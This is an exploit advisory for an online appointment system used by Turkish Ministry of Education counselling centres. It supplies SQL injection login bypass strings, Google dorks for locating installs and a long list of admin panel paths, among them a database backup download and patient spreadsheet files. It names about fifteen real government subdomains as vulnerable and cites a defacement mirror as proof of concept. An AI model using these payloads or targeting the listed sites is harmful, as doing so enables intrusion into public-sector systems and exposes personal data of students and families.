########################################################################################################## # Exploit Title : Webmaster Atom Bilgisayar Yazılım Danışmanllık Ministry of Education TR *.subdomains RAM Online Appointment Atom Computers Unauthenticated Access Control Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 15/10/2018 # Vendor Homepage : atombilgisayar.com.tr # Tested On : Windows and Linux # Category : WebApps # Google Dork : intext:''Webmaster Atom Bilgisayar Yazılım Danışmanllık'' site:meb.gov.tr inurl:''/randevu/index.php?sayfa=rapor'' site:meb.gov.tr inurl:''/randevu/index.php?sayfa=iletisim'' site:meb.gov.tr # Exploit Risk : Medium # CWE : CWE-287 - [ Improper Authentication ] - CWE-592 - [ Authentication Bypass Issues ] - CWE-284 [ Improper Access Control ] + CWE-264 - [ Permissions, Privileges, and Access Controls ] ########################################################################################################## # Webmaster Atom Computer Software Counselling Improper Access Control Vulnerability # Admin Panel Login Path : /randevu/admin/ /onlinerandevu/admin/ # Authentication Bypass Exploit : Admin Username : anything' OR 'x'='x Admin Password : anything' OR 'x'='x You can try also this, too. 1' or 1=1 -- - 1' or 1=1 -- - '=''or' '=''or' # Useable Admin Control Panel URL Links Exploits => /randevu/admin/index.php /randevu/admin/index3.php /randevu/admin/yedekal.php => SQL Database Backup Arbitrary File Download /admin/randevu.xls /onlinerandevu/admin/hasta.xls /randevu/admin/sifre.php /randevu/admin/resetle.php /randevu/admin/index4.php /randevu/admin/ogretmen.php /randevu/admin/karar.php /randevu/admin/egitsel.php /randevu/admin/test.php /randevu/admin/sebeb.php /randevu/admin/tani.php /randevu/admin/destek.php /randevu/admin/oneri.php /randevu/admin/index1.php /randevu/admin/dr.php /randevu/admin/saat.php /randevu/admin/basvuru.php /randevu/admin/sart.php /randevu/admin/hastalik.php /randevu/admin/site.php /randevu/admin/ilce.php /randevu/admin/okul.php /randevu/admin/kademe.php /randevu/admin/tatil.php /randevu/admin/index5.php /randevu/admin/randevu.php /randevu/admin/liste.php /randevu/admin/page1.php /randevu/admin/rapor.php /admin/admin.php?islem=randevu&randevu=listele /admin/admin.php?islem=ogretmen /admin/admin.php?islem=kullanici /randevu/admin/admin.php?islem=tarih /randevu/admin/admin.php?islem=saat /randevu/admin/admin.php?islem=okul /randevu/admin/admin.php?islem=randevu&randevu=dokum_ver /randevu/admin/admin.php?islem=randevu&randevu=arsiv /randevu/admin/admin.php?islem=randevu&randevu=reddedilen /randevu/admin/admin.php?islem=randevu&randevu=rezerve # Directory Paths => /randevu/index.php?sayfa=iletisim /randevu/index.php?sayfa=iptal /randevu/index.php?sayfa=sorgu /randevu/index.php?sayfa=rapor /randevu/index.php?sayfa=%F6gretmen%20giri%FEi ########################################################################################################## Example Vulnerable Sites *.subdomains of meb.gov.tr => bucaram.meb.gov.tr/randevu/admin/ => [ Proof of Concept ] => zone-h.org/mirror/id/31762392 randevu.atombilgisayar.com.tr/admin/ fatsaram.meb.gov.tr/randevu/admin/ adiyamanram.meb.gov.tr/randevu/admin/ tavsanliram.meb.gov.tr/randevu/admin/ sokeram.meb.gov.tr/randevu/admin/ sancakteperam.meb.gov.tr/randevu/admin/ pendikram.meb.gov.tr/randevu/admin/ kilisram.meb.gov.tr/randevu/admin/ kcekmeceram.meb.gov.tr/randevu/admin/ esenlerram.meb.gov.tr/randevu/admin/ bakirkoyram.meb.gov.tr/randevu/admin/ bahcelievlerram.meb.gov.tr/randevu/admin/ arnavutkoyram.meb.gov.tr/randevu/admin/ boluram.meb.gov.tr/randevu/admin/ ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################